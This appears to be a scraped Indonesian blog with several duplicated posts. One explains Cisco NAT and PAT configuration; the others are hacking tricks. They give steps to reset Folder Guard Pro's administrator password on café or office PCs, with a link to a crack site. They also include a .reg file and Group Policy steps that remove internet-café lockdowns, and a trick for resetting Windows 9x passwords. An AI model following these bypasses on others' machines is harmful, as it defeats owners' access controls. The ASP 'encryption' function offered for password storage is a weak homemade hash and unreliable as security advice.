Cara mengatasinya, kita bisa bikin pool dgn 5 public IP address, dan 1 IP terakhir buat PAT. IP terakhir, 195.1.134.6 digunakan sbg IP address utk interface s0/0
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.5 netmask 255.255.255.248
Router(config)#ip nat inside source list internal_network pool public_IP
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Dgn begini, 5 private IP yg pertama akan di translate ke 5 public IP di pool, sedangkan private IP yg lain akan di translate ke ip ke-6, yg merupakan ip address dari interface s0/0.
5. Ok, ayo masuk ke contoh yg lebih advance:
Kita punya 6 public IP dari range 195.1.134.1.- 195.1.134.6
IP address 195.1.134.4 kita gunakan sbg ip address interface s0/0 router kita
IP address 195.1.134.1 digunakan oleh router ISP interface s0/0, yg merupakan default gateway router kita
IP address 195.1.134.2 mau kita gunakan sbg ip address web server kita, dgn real IP 192.168.1.2
Dan IP addres 195.1.134.3 mau kita gunakan sbg ip address mail server kita, dgn real IP 192.168.1.3
Sisanya, 195.1.134.5 dan 6, akan kita pergunakan nanti jika kita punya server2 baru
- Bikin ACL buat semua network, access-list internal_network permit 192.168.1.0 0.0.0.255
- Konfigure PAT buat semua internal network ke interface s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- Bikin one-to-one NAT buat web dan mail server
Router(config)#ip nat inside source static 192.168.1.2 195.1.134.2
Router(config)#ip nat inside source static 192.168.1.3 195.1.134.3
Jgn kuatir jika terjadi overlap antara static NAT diatas dgn PAT di konfigurasi sebelumnya. Static NAT akan meng-overide rule utk 192.168.1.2 dan 192.168.1.3, sehingga ke-2 IP tsb tidak akan di PAT meskipun termasuk dlm ACL internal_network.
Jgn lupa enable NAT di interface s0/0 dan e0/0 spt contoh no.1
Dan kalo kita punya IOS Firewall dan ACL ingress in interface s0/0, maka kita harus permit koneksi dari internet ke public IP web dan mail server kita, dgn port yg terkait spt tcp 80 dan 25. Jadi di ACL ingress s0/0 jgn gunakan real IP address.
6. Kita terkoneksi dgn ISP, router kita cuman dapet 1 public IP address buat interface s0/0 tapi punya web server dan mail server? Jgn kuatir, ini bisa dilakukan dgn teknik port redirection.
Jadi, bikin dulu PAT biar internal network kita bisa konek ke Internet
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Trus bikin port redirection buat traffic ke port 80 dan 25, di contoh ini private IP web server kita tetap 192.168.1.2 dan mail server 192.168.1.3
Router(config)#ip nat inside source static tcp 192.168.1.2 80 interface s0/0 80
Router(config)#ip nat inside source static tcp 192.168.1.3 25 interface s0/0 25
Dgn cara begini, traffic yg datang ke public IP interface serial port 80 akan di redirect ke real IP web server 192.168.1.2, dan traffic yg datang ke serial port 25 akan di redirect ke real IP mail server 192.168.1.3
Tinggal daftar di public DNS server untuk web dan MX record mail server kita, untuk me-resolve ke public IP router interface s0/0. Keuntungan lain dgn cara PAT ke interface adalah kita bisa saja mendapatkan IP address yg berbeda-beda (dynamic IP) setiap kali konek ke ISP.
Dgn setingan di atas, kita tidak perlu kuatir IP kita akan berubah.
Hanya mungkin public IP yg kita daftarkan untuk web dan mail server di public DNS server harus selalu di-update sesuai dgn IP address yg sedang kita dapatkan.
Mulai kerasakan The Power of NAT?
Read More..
10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)
Dan karena ini adalah private address, jaringan kita tentunya tidak dapat berkomunikasi dgn jaringan lain di Internet, karena semua host yg ingin terkoneksi di Internet harus menggunakan global atau public IP address. Untuk ini kita perlu men-translate IP address kita yg private menjadi public IP address.
Alasan lain untuk menggunakan NAT adalah security. Kita bisa men-translate seluruh jaringan kita (missal 254 PC) menjadi 1 public IP. Teknik ini disebut many-to-one NAT atau biasa disebut Port Address Translation (PAT). Teknik ini sangat bermanfaat jika kita menginginkan user di jaringan kita untuk meng-inisiasi koneksi ke Internet (browsing internet atau mengirim email misalnya), tapi kita tidak menginginkan host dari Internet untk meng-inisiasi koneksi ke PC user kita.
Host dari Internet tidak bisa meng-inisiasi koneksi ke internal host kita karena hanya ada 1 public IP address yg terlihat di jaringan kita, sedangkan jumlah PC yg sebenarnya ada lebih dari 1. Tentunya jika PC kita yg meng-inisiasi, maka reply atau return packet akan bisa
kembali karena device yg kita gunakan untuk melakukan NAT, akan memiliki mapping table dari NAT yg terjadi di jaringan.
Untuk kasus one-to-one NAT, dimana 1 private IP akan di-translate menjadi 1 global IP, maka mapping nya akan spt berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
— 195.1.134.1 192.168.1.1 — —
— 195.1.134.2 192.168.1.2 — —
Dalam contoh ini, IP private 192.168.1.1 di-translate ke public IP 195.1.134.1, IP private 192.168.1.2 di-translate ke public IP 195.1.134.2 dst.
Inside local adalah terminologi utk real IP address PC di jaringan kita, sedangkan Inside Global adalah public IP address yg kita gunakan untuk men-translasi real IP address tsb.
Outside local adalah local IP address dari tujuan kita sebagaimana kita melihatnya dari jaringan kita. Sedangkan Outside global adalah global IP address dari tujuan kita yg terlihat di Internet.
Ini bermanfaat utk destination based NAT, sbg contoh sbg berikut:
Ada server di Internet dgn global IP address 11.11.11.11, tapi kita ingin semua users di jaringan kita utk melihat server tsb sbg 192.168.1.11
Maka kita bisa melakukan destination based NAT, dgn outside local adalah 192.168.1.11 dan outside global, IP address tujuan yg sebenernya, adalah 11.11.11.11.
Jika kita tidak melakukan destination based NAT, maka outside local dan outside global dari tujuan kita akan sama, yaitu public IP tujuan yg sebenernya, dan ini bisa dilihat di contoh mapping PAT.
Untuk contoh many-to-one NAT atau PAT, dimana banyak real IP dari PC kita di-translate menjadi 1 public IP, maka contoh mapping nya sbg berikut:
Router#sh ip nat tra
Pro Inside global Inside local Outside local Outside global
tcp 195.1.134.4:12338 192.168.1.3:12338 33.33.33.33:23 33.33.33.33:23
tcp 195.1.134.4:12337 192.168.1.2:12337 22.22.22.22:23 22.22.22.22:23
Dalam contoh ini, kita melakukan telnet (destination tcp port 23) ke remote host 22.22.22.22
dari private IP 192.168.1.2, dan telnet ke remote host 33.33.33.33 dari private IP 192.168.1.3.
Kita bisa lihat bahwa ke-2 private IP kita di-translate ke public IP yg sama, yaitu 195.1.134.4. Yg membedakan adalah source port yg digunakan di public IP.
Jadi di mapping ini terlihat bahwa koneksi dari 192.168.1.2 di map ke 195.1.134.4 port 12337, sedangkan koneksi dari 192.168.1.3 di map ke 195.1.134.4 port 12338.
Dgn adanya mapping ini, remote host 22.22.22.22 ketika mengirimkan paket reply (ingat di TCP/IP reply dari remote host destination portnya ditujukan ke source port dari host kita), akan mengirimkan paket ke 195.1.134.4 port 12337. Sedangkan reply packet dari 33.33.33.33 kan ke 195.1.134.4 port 12338.
Berdasarkan mapping tadi, NAT device atau router yg melakukan map bisa mengetahui bahwa packet reply dari 22.22.22.22 harus dikirimkan ke host 192.168.1.2 dan paket reply dari 33.33.33.33 harus dikirimkan ke host 192.168.1.3
Dari ke-2 contoh di atas kelihatan bahwa untuk normal NAT atau one-to-one NAT, setiap private IP akan memiliki public IP sendiri sehingga setiap host di jaringan kita masih bisa di hubungi dari luar. Host dari Internet masih bisa utk menghubungi tiap host kita karena
mereka memiliki public IP yg berbeda-beda.
Namun untuk kasus many-to-one NAT atau PAT, host dari Internet tidak dapat menghubungi setiap host karena semua host memiliki 1 public IP yg sama. Host dari internet hanya bisa me-reply koneksi dari host kita berdasarkan source port yg berbeda-beda.
Ok, langsung masuk contoh konfigurasi biar makin jelas. Contoh dilakukan dgn menggunakan Cisco router dgn 1 ethernet interface konek ke internal network dan 1 serial interface konek ke Internet. Kalo udah ngerti konsepnya bisa pake NAT device apa aja, gue sendiri buat memproteksi home lab gue pake OpenBSD PF.
Topologi:
Internal network – (eth0) router (s0/0) – internet
Internal network kita menggunakan private IP 192.168.1.0/24. IP address eth0 router kita 192.168.1.1 yg merupakan default gateway dari semua host di internal network.
1. Many-to-one PAT, semua private IP ke 1 public IP address
Kita cuma dapet 1 IP address dari ISP 195.1.134.2/30 yg juga merupakan IP address serial 0/0, router ISP kita menggunakan IP 195.1.134.1 yg juga merupakan default route router kita.
Maka konfigurasi PAT sbg berikut:
- Buat ACL yg mem-permit semua network 192.168.1.0/24
Router(config)#ip access-list standard internal_network
Router(config-std-nacl)#permit 192.168.1.0 0.0.0.255
- Bikin NAT rule untuk mentranslate net 192.168.1.0/24 ke 195.1.134.2 yg merupakan IP address s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- enable NAT di interface e0/0 dan s0/0
Router(config)#int e0/0
Router(config-if)#ip nat inside
Router(config)#int s0/0
Router(config-if)#ip nat outside
2. ISP kita ternyata memberikan kita public IP 195.1.134.0/24, yg berarti range public IP yg bisa kita gunakan adalah 195.1.134.1 – 195.1.134.254. Ini berarti kita bisa melakukan one-to-one NAT, contoh:
192.168.1.1 ke 195.1.134.1
192.168.1.2 ke 195.1.134.2, dst.
Maka konfigurasi yg perlu dilakukan hanya:
Router(config)#ip nat inside source static network 192.168.1.0 195.1.134.0 /24
Tentunya enable NAT di e0/0 dan s0/0 spt contoh no.1
3. Kalo gak dapet persis 254 public IP gimana? Misal dapetnya 195.1.134.0/29, yg berarti range public IP yg bisa digunakan adalah 195.1.134.1-195.1.134.6 (ingat dgn /29 ada total 8 IP dari 0 sampai 7, tapi 0 adalah network address dan 7 sebagai IP terakhir merupakan
broadcast address).
Jika kita mau mentranslate net 192.168.1.0/24 ke range IP 195.1.134.1-195.1.134.6
- bikin NAT pool
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.6 netmask 255.255.255.248
- bikin NAT rule, pake ACL internal_network spt contoh no.1 buat permit semua internal net 192.168.1.0/24
Router(config)#ip nat inside source list intenal_network pool public_IP
Jgn lupa enable NAT di e0/0 dan s0/0 spt contoh no.1
4. Ada masalah dgn contoh no.3? Ada.
Dalam 1 waktu, hanya ada 6 internal private IP yg bisa di translate ke 6 public IP. Jadi koneksi dari internal host ke 7 akan gagal dan harus menunggu sampai translation mapping timeout dan di clear, sehingga public ip kembali tersedia.
Cara mengatasinya, kita bisa bikin pool dgn 5 public IP address, dan 1 IP terakhir buat PAT. IP terakhir, 195.1.134.6 digunakan sbg IP address utk interface s0/0
Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.5 netmask 255.255.255.248
Router(config)#ip nat inside source list internal_network pool public_IP
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Dgn begini, 5 private IP yg pertama akan di translate ke 5 public IP di pool, sedangkan private IP yg lain akan di translate ke ip ke-6, yg merupakan ip address dari interface s0/0.
5. Ok, ayo masuk ke contoh yg lebih advance:
Kita punya 6 public IP dari range 195.1.134.1.- 195.1.134.6
IP address 195.1.134.4 kita gunakan sbg ip address interface s0/0 router kita
IP address 195.1.134.1 digunakan oleh router ISP interface s0/0, yg merupakan default gateway router kita
IP address 195.1.134.2 mau kita gunakan sbg ip address web server kita, dgn real IP 192.168.1.2
Dan IP addres 195.1.134.3 mau kita gunakan sbg ip address mail server kita, dgn real IP 192.168.1.3
Sisanya, 195.1.134.5 dan 6, akan kita pergunakan nanti jika kita punya server2 baru
- Bikin ACL buat semua network, access-list internal_network permit 192.168.1.0 0.0.0.255
- Konfigure PAT buat semua internal network ke interface s0/0
Router(config)#ip nat inside source list internal_network interface s0/0 overload
- Bikin one-to-one NAT buat web dan mail server
Router(config)#ip nat inside source static 192.168.1.2 195.1.134.2
Router(config)#ip nat inside source static 192.168.1.3 195.1.134.3
Jgn kuatir jika terjadi overlap antara static NAT diatas dgn PAT di konfigurasi sebelumnya. Static NAT akan meng-overide rule utk 192.168.1.2 dan 192.168.1.3, sehingga ke-2 IP tsb tidak akan di PAT meskipun termasuk dlm ACL internal_network.
Jgn lupa enable NAT di interface s0/0 dan e0/0 spt contoh no.1
Dan kalo kita punya IOS Firewall dan ACL ingress in interface s0/0, maka kita harus permit koneksi dari internet ke public IP web dan mail server kita, dgn port yg terkait spt tcp 80 dan 25. Jadi di ACL ingress s0/0 jgn gunakan real IP address.
6. Kita terkoneksi dgn ISP, router kita cuman dapet 1 public IP address buat interface s0/0 tapi punya web server dan mail server? Jgn kuatir, ini bisa dilakukan dgn teknik port redirection.
Jadi, bikin dulu PAT biar internal network kita bisa konek ke Internet
Router(config)#ip nat inside source list internal_network interface s0/0 overload
Trus bikin port redirection buat traffic ke port 80 dan 25, di contoh ini private IP web server kita tetap 192.168.1.2 dan mail server 192.168.1.3
Router(config)#ip nat inside source static tcp 192.168.1.2 80 interface s0/0 80
Router(config)#ip nat inside source static tcp 192.168.1.3 25 interface s0/0 25
Dgn cara begini, traffic yg datang ke public IP interface serial port 80 akan di redirect ke real IP web server 192.168.1.2, dan traffic yg datang ke serial port 25 akan di redirect ke real IP mail server 192.168.1.3
Tinggal daftar di public DNS server untuk web dan MX record mail server kita, untuk me-resolve ke public IP router interface s0/0. Keuntungan lain dgn cara PAT ke interface adalah kita bisa saja mendapatkan IP address yg berbeda-beda (dynamic IP) setiap kali konek ke ISP.
Dgn setingan di atas, kita tidak perlu kuatir IP kita akan berubah.
Hanya mungkin public IP yg kita daftarkan untuk web dan mail server di public DNS server harus selalu di-update sesuai dgn IP address yg sedang kita dapatkan.
Mulai kerasakan The Power of NAT?
Read More..
Menjebol Password FOLDER GUARD Pro 5.2
Keamanan memang sangat penting melihat perkembangan teknologi informasi yang demikian pesat sekarang ini, namun teknologi kejahatan saat ini masih lebih unggul satu tingkat dibanding dengan pencegahannya. Tapi itu tidak menjadi landasan untuk kita bisa terus mengikuti perkembangan Teknologi security yang mungkin akan lebih maju.
Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.
Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.
Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.
Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.
Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â
Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.
Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.
Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey†/pw , isi nama shortcutnya dengan reset.
Â
lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset†berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.
Read More..
Mungkin Anda pernah mendengar salah satu tools proteksi berbasis windows yang sangat terkenal yaitu FOLDER GUARD, versi terbarunya FOLDER GUARD PRO 5.3, untuk FOLDER GUARD PRO 5.2 bisa Anda cari di www.google.com, & dan cracknya di http://paulyoung.yeah.net.
Software ini memang dibilang sangat handal dibanding dengan software proteksi lainya , karena bisa menghiddenkan subkey yang berhubungan dengan system folder guard tersebut, sehingga akan membuat kita kesulitan untuk melihat sejauh mana sistem tersebut. Tapi perlu diketahui banyak software proteksi yang memberikan fitur-fitur praktis, sehingga akan memudahkan penggunanya dan akan mengundang adanya hole pada software itu sendiri, Contohnya FOLDER GUARD PRO 5.2.
Sewaktu kita instalasi software ini, kita akan diminta untuk mengeset apa yang perlu diproteksi, apakah folder atau sistem, baru kita akan diminta untuk memasukan password Administrator dan Master dan setelah itu di save.
Password Administrator berfungsi untuk kita menjalankan folder Guard, sedangkan password Master berfungsi untuk menjalankan Toggle protection sehingga proteksi proteksi folder guard bisa dibikin enabled atau disabled secara cepat tanpa perlu konfigurasi.
Nah biasanya setelah kita instalasi folder guard dia akan membuat folder di directory windows\desktop\Folder Guard. Mungkin Anda sudah nggak sabar denger ocehan saya. Sekarang coba anda klik file Reset password yang ada di \windows\desktop\Folder Guard. Setelah itu Anda akan diminta Mengisi form registrasi pertama kalian, sebelumnya saya ingatkan anda diminta mencari dulu crack buat folder guard pro 5.2 setelah itu isi form registrasi harus sama dengan yang anda isi sewaktu instalasi pertama. Nah dengan cara tersebut diatas kita akan masuk ke folder guard tanpa password.
Â
Â
Tapi yang menjadi masalah jika posisi kita diwarnet atau di kantor yang menggunakan software folder guard , tentunya kita masukin username serta registrasi code kita dg menggunakan software Cracking folder guard pro 5.2, hal itu tidak akan berhasil Karena dia akan meminta user name registrasi serta codenya sewaktu install pertama bukan registrasi code yang baru.
Sekarang bagaimana kalau di warnet atau kantor mudah saja, coba Anda copykan file Fgkey.exe, Fguard32.dll, Fguard.vxd dari komputer Anda yang ada didirektory \Program Files\WinAbility\Folder Guard\ kedalam disket, kalau sudah klik tombol start trus run, ketik regedit kalau regedit dikunci Anda import aja file .reg yang berisikan disabled registry tools dari disket Anda lalu klik kanan, kalau sudah masuk ke subkey \HKEY_LOCAL_MACHINE\Software\Winability\Folder Guard\Setup\1, setelah itu delete key yang name valuenya info.
Sekarang buat shortcut untuk file fgkey.exe yang ada di drive A, trus tambahkan options / pw,pada command line “A:\fgkey†/pw , isi nama shortcutnya dengan reset.
Â
lalu kalian klik shortcut reset tersebut kemudian klik continue pada form registrasi, jika keluar message “The Administrator's Password For Folder Guard has been reset†berarti Selamat anda telah berhasil menembus password administrator folder guard pro 5.2. Perlu diketahui cara ini juga sudah saya coba pada Folder Guard pro 5.3 yang terbaru dan berhasil, sekarang coba jalankan program folder guardnya, kalian masuk tanpa password setelah itu kalian bisa rubah setting proteksinya sekaligus mengganti passwordnya eh nggak boleh jahat. Artikel ini saya buat untuk tujuan security, sehingga para pemilik warnet bisa lebih hati-hati & waspada dalam hal proteksi sistem.
Read More..
Pemrograman ASP untuk Mengenkripsi Password
Seringkali dalam situs ada fitur login username dan password atau login khusus administrator, untuk dapat mengakses dan menggunakan berbagai fitur yang disimpan dalam database(umumnya SQL atau Access)
Namun, bagaimana jika seorang attacker mendapatkan table user dan semua password user? Ini malapetaka. Tentunya anda ingin menyembunyikan atau mengenkripsi password dalam tabel user. Berikut ini saya berikan VBscript yang dikombinasikan dengan script ASP.
untuk mengenkripsi password user. Terlebih dahulu kita membuat sebuah fungsi yang kita perintahkan untuk mengenkripsi password ke dalam karakter ASCII. Fungsi ini kita namakan fungsi enkripsi. Berikut ini adalah VBscript yang akan kita gunakan.
Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function
VBscript ini akan kita gunakan dalam file bernama enkripsi.asp. Lihat contohnya dibawah ini:
<%
Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function
%>
ÂEnkripsi
<% If request.form("name") = "" Then %>
Username:
Password:
<% Else %>
<% response.write enkripsi(request.form("name"),request.form("pass")) %>
<% End If %>
CATATAN:
Anda dapat mengubah kode berikut sesuai dengan konfigurasi situs anda
misalnya menjadi seperti ini:
Fungsi ini tidak dapat dibalik, maksudnya jika user lupa password, maka harus diberikan password baru. Tapi kita tidak membahas masalah fitur ini. Disini saya hanya menerangkan metode enkripsi password melalui pemrograman ASP.
Meskipun script ini bukan enkripsi tingkat tinggi, tapi cukup efektif dalam mengelabui hacker-hacker kelas teri (sorry kagak bermaksud menghina, tapi iya khan? hehe). Untuk yang hacker kelas berat, kita memerlukan area secure yang terenkripsi, seperti https://
Read More..
Namun, bagaimana jika seorang attacker mendapatkan table user dan semua password user? Ini malapetaka. Tentunya anda ingin menyembunyikan atau mengenkripsi password dalam tabel user. Berikut ini saya berikan VBscript yang dikombinasikan dengan script ASP.
untuk mengenkripsi password user. Terlebih dahulu kita membuat sebuah fungsi yang kita perintahkan untuk mengenkripsi password ke dalam karakter ASCII. Fungsi ini kita namakan fungsi enkripsi. Berikut ini adalah VBscript yang akan kita gunakan.
Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function
VBscript ini akan kita gunakan dalam file bernama enkripsi.asp. Lihat contohnya dibawah ini:
<%
Function enkripsi(x1, x2)
   s = ""
   t = 0
   For i = 1 to len(x1)
       t = t + asc(mid(x1,i,1))
   Next
   For i = 1 to len(x2)
       y = (t + asc(mid(x2,i,1)) * asc(mid(x2,((i+1) mod len(x2)+1),1))) mod 255
       s = s & chr(y)
   Next
   For i = (len(x2) + 1) to 10
       If t>598.8 Then t = 598.8
       y = t^3*i mod 255
       s = s & chr(y)
   Next
   enkripsi = s
End Function
%>
Â
<% If request.form("name") = "" Then %>
Username:
Password:
<% Else %>
<% response.write enkripsi(request.form("name"),request.form("pass")) %>
<% End If %>
CATATAN:
Anda dapat mengubah kode berikut sesuai dengan konfigurasi situs anda
misalnya menjadi seperti ini:
Fungsi ini tidak dapat dibalik, maksudnya jika user lupa password, maka harus diberikan password baru. Tapi kita tidak membahas masalah fitur ini. Disini saya hanya menerangkan metode enkripsi password melalui pemrograman ASP.
Meskipun script ini bukan enkripsi tingkat tinggi, tapi cukup efektif dalam mengelabui hacker-hacker kelas teri (sorry kagak bermaksud menghina, tapi iya khan? hehe). Untuk yang hacker kelas berat, kita memerlukan area secure yang terenkripsi, seperti https://
Read More..
Trik Mereset Password Windows 9x
Password pada windows 9x sebenarnya sangat rentan dan tidak di disain untuk menjaga keamanan usernya. System operasi ini sebenarnya hanyalah untuk penggunaan personal atau yang dinamakan home user.
Trik berikut bisa anda gunakan untuk mengganti password ataupun mematikan password pada system operasi windows 9x. Sebenarnya password pada 9x tidak terlalu berguna, misalkan pada saat di minta memasukkan password toh kita bisa menekan escape dan segalanya selesai. Hanya saja jika tekan escape, maka otomatis fasilitas jaringan tidak akan di jalankan.
Gimana jika ada password yang ingin kita ganti ? setiap kita memasukkan nama dan password pada 9x, maka akan diciptakan file dengan format namalogin.pwl. Anda tinggal cari file ini kemudian hapus dan account itu anda tinggal create ulang. Dengan cara ini pula anda bisa mengetahui ada account apa-apa saja yang terdapat pada windows 9x anda.
Semoga sedikit trik ini berguna buat kita semua.
Read More..
Trik berikut bisa anda gunakan untuk mengganti password ataupun mematikan password pada system operasi windows 9x. Sebenarnya password pada 9x tidak terlalu berguna, misalkan pada saat di minta memasukkan password toh kita bisa menekan escape dan segalanya selesai. Hanya saja jika tekan escape, maka otomatis fasilitas jaringan tidak akan di jalankan.
Gimana jika ada password yang ingin kita ganti ? setiap kita memasukkan nama dan password pada 9x, maka akan diciptakan file dengan format namalogin.pwl. Anda tinggal cari file ini kemudian hapus dan account itu anda tinggal create ulang. Dengan cara ini pula anda bisa mengetahui ada account apa-apa saja yang terdapat pada windows 9x anda.
Semoga sedikit trik ini berguna buat kita semua.
Read More..
TRIK JITU AMPUH MENGHADAPI BILLING EXPLORER YANG MEMATIKAN AKSES BILA SEDANG BERINTERNET
Sebelumnya saya ucapkan banyak terima kasih buat Jasakom community. Terimakasih buat para hacker mania and cracker mania yang dulu sudah mengajari aku banyak hal, maka ijinkan saya mereview your coretan kembali. Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba...
Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...
Pertama Buka GPEdit.msc dulu
caranya:
C:\Windows\System32\GPEdit.msc <-- double Click
1. Jika Klik Kanan di Desktop tidak bisa
Masuk Ke GPEdit.msc
Masuk ke [User Configuration/Administrative Templates/Desktop]
- Disable (Hide and disable all items on the desktop)
Jika MyComputer tidak ada
- Disable (Remove My Computer icon on the Desktop)
2. Jika Ingin mengubah properties pada taskbar start menu
masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar]
- Disable (Prevent changes to Taskbar and Start Menu Settings)
Jika Menu Run tidak muncul
- Disable (Remove Run menu from Start Menu)
Jika menu pada taskbar saat klik kanan tidak muncul
- Disable (Remove access to the context menus for the taskbar)
3. Apabila Control Panel tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/Control Panel]
- Disable (Prohibit access to the Control Panel)
4. Jika Command Prompt tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System]
- Disable (Prevent access to the command prompt)
Jika Registry Editor tidak bisa di akses
- Disable (Prevent access to registry editing tools)
5. Jika Task Manager tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]
- Disable (Remove Task Manager)
6. Jika Folder Options pada Windows Explorer tidak muncul
Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer]
- Disable (Remove these Folder Options menu item from the Tools menu)
Jika Windows Key tidak berfungsi
- Disable (Turn off Windows+X hotkeys)
------------------------------------------- end --------------------------------------------
--------------------------------------- Regedit. ---------------------------------------
==> Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <-- double Click
--- atau ---
C:\Windows\regedit.exe <-- double Click
------------------------------------------ start. ------------------------------------------
Regedit 4
[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000
"NoViewContextMenu"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoVirtMemPage"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
